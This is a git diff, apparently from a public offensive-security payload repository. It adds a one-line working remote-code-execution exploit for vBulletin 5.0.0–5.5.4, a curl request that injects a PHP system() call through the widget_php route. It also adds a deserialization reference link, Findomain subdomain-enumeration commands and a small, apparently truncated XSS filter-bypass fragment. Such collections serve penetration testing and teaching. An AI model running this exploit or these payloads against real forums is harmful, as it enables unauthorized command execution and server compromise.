diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh new file mode 100644 index 0000000..3ebf64a --- /dev/null +++ b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh @@ -0,0 +1 @@ +curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" \ No newline at end of file diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 4a0ed0f..aa05825 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -24,4 +24,5 @@ Check the following sub-sections, located in other files : * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) -* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals \ No newline at end of file +* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals +* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) \ No newline at end of file diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index 0806a99..88ee0e2 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -9,6 +9,7 @@ * EyeWitness * Sublist3r * Subfinder + * Findomain * Aquatone (Ruby and Go versions) * AltDNS * MassDNS @@ -86,6 +87,17 @@ go get github.com/subfinder/subfinder ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt ``` +### Using Findomain + +```powershell +$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux +$ chmod +x findomain-linux +$ findomain_spyse_token="YourAccessToken" +$ findomain_virustotal_token="YourAccessToken" +$ findomain_fb_token="YourAccessToken" +$ ./findomain-linux -t example.com -o +``` + ### Using Aquatone - old version (Ruby) ```powershell diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 6bd8aa1..a0ccd8a 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -751,6 +751,8 @@ You don't need to close your tags. ```javascript %26%2397;lert(1) +alert +> ``` ### Bypass using Katana